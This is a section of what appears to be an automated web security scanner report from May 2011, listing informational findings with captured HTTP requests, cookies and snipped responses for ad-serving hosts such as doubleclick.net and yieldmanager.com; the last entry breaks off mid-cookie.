20.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
20.2. http://480-adver-view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:31 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s13; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...
20.3. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7098
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Thu, 12 May 2011 13:28:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
20.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5362797.34

Request

GET /adi/N6296.126265.CASALE/B5362797.34;sz=300x250;click0=http://c.casalemedia.com/c/4/1/84483/;ord=378452145 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6565

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
20.5. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/abt.newsissues/newsissues_urbanlegends

Request

GET /adi/abt.newsissues/newsissues_urbanlegends;svc=;site=urbanlegends;t=26;bt=1;bts=1;pc=1;auc=2;fd=1;fs=0;sp2=0;go=13;a=;kw=;chan=newsissues;syn=about;tile=3;af=1;r=-2;sz=336x280;u=B5CDUi2520kA1h032128;dc_ref=http%3A//urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm;ord=1B5CDUi2520kA1h032128 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7768

<html><head><title>Click Here!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><center><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights r
...[SNIP]...
20.6. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.blogs/bizfeed/index

Request

GET /adi/pcw.main.blogs/bizfeed/index;blg=bizfeed;pg=index;pos=336showcase;tile=2;sz=336x280;ord=04734282?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1311

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/ULA/iview/312602163/direct/
...[SNIP]...
20.7. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Request

GET /adi/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6571

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
20.8. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?gk8AAFU9GAAOhIEAAAAAAN17IwAAAAAAAAAAAAIAAAAAABAAAwAFCRQ-JgAAAAAAtMofAAAAAAAuiC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-1w8AAAAAAAIAAwAAAAAAPwrXo3A9.j8Mk6mCUUkDQDQzMzMzMwlA30-Nl24SEEBv27Zt27YJQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABtGq5ymMUUCtIQTrGgNDqaPlUrqNI4RJlXze4DAAAAAA==,,http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565,Z%3D300x250%26anmember%3D541%26anprice%3D300%26s%3D1588565%26_salt%3D2649311919%26B%3D10%26r%3D0,15c8eadc-7c9c-11e0-a0b7-07e40bfd5098 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!